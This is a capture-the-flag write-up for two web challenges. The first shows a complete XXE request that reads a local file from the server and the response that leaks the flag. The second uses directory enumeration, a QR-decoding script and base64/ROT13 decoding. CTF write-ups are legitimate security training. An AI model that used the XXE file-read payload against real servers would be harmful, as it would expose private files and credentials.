Web - HackMD

# Web ## Mr. Hekker (Shuvsec) It was an XXE vulnerability Request ``` POST /contact.php HTTP/1.1 Host: hekker.noobarmy.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: text/plain;charset=UTF-8 Content-Length: 240 Origin: http://hekker.noobarmy.org Connection: close Referer: http://hekker.noobarmy.org/ DNT: 1 Sec-GPC: 1 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe0alxq SYSTEM "file:///home/hekker/flag.txt"> ]><contact><name>axe</name><email>email@mail.com</email><subject>subject</subject><message>undefined&xxe0alxq;</message></contact> ``` Response ``` HTTP/1.1 200 OK Date: Sun, 20 Dec 2020 05:11:42 GMT Server: Apache/2.4.38 (Debian) X-Powered-By: PHP/7.2.34 Vary: Accept-Encoding Content-Length: 73 Connection: close Content-Type: text/html; charset=UTF-8 Your msg has been receipt as undefinedvulncon{MR_H4kk3r_w1th_XXE_(+_+)} ``` ## Maze (j11b0) http://maze.noobarmy.org/ Use gobuster to find out /projects From the source we find out how to access some images: ```  ``` These are QR-codes. Let's dump their contents: ``` import requests import io from pyzbar.pyzbar import decode from PIL import Image for i in range(28): r = requests.get('http://maze.noobarmy.org/projects/justsomerandomfoldername/image-{0}.png'.format(i)) image=Image.open(io.BytesIO(r.content)) decoded = decode(image) print ("i:"+str(i)+": "+decoded[0].data.decode('utf-8')) ``` Output: ``` i:0: Hello i:1: and i:2: welcome i:3: to i:4: this i:5: challenge! i:6: We i:7: hope i:8: that i:9: collecting i:10: these i:11: images i:12: was i:13: not i:14: that i:15: hard i:16: for i:17: you, i:18: anyways i:19: just i:20: so i:21: you i:22: know i:23: i i:24: love i:25: the i:26: number i:27: 13 ``` Let's take a look at 13 ![](https://i.imgur.com/txTchqF.png) ``` exiftool image-13.png | grep Creator Creator : aWh5YXBiYXtqQCRfN3UxJF8zaTNhX0BfajNvX3B1QHl5M2F0Mz99 ``` base64 decode and ROT-13 for the flag.